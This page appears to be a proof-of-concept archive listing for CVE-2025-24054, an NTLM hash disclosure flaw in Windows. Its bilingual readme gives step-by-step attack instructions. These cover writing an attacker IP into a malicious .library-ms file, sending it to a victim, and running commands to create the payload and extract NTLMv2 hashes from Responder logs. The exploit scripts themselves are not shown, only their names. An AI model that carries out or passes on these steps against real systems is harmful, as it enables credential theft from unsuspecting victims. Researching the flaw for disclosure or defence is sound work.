Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24054 PoC — NTLM Hash Disclosure Spoofing Vulnerability

Source
Associated Vulnerability
Title:NTLM Hash Disclosure Spoofing Vulnerability (CVE-2025-24054)
Description:External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.
Description
CVE 2025 24054
Readme
## VIETNAMESE ##
- Với file CVE-2025-24054.py và  Exploit.library-ms
- Thay ip vào file Exploit.library-ms gửi file cho sau đó chạy CVE-2025-24054.py là OK 
- Đối với ELAINA-POC.py
- Tạo file .library-ms độc hại:
 - python3 ELAINA-POC.py create -ip 192.168.1.100 -o payload.library-ms -
- gửi victim 
Trích xuất hash từ log Responder:
- python3 ELAINA-POC.py extract -f /path/to/Responder/logs/SMB-NTLMv2.lo -
## English ##
- With the file CVE-2025-24054.Py and Exploit.library-MS
- Replace IP to File Exploit.library-MS, send the file and then run CVE-2025-24054.Py is ok
- For elaina-poc.py
- Create a toxic .library-MS file: 
- Python3 Elaina -Poc.py Create -ip 192.168.1.100 -O Payload.library -MS -
- Send Victim
 -Extract the hash from log Responder:
-Python3 Elaina-poc.py Extract -f /path/to/responder/logs/smb-ntlmv2.lo -
File Snapshot

[4.0K] /data/pocs/218038ba0d949453d1ab89ed6c6ab7f1dcbfe579 ├── [ 518] CVE-2025-24054.py ├── [3.4K] ELAINA-POC.py ├── [ 690] Exploit.library-ms └── [ 861] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →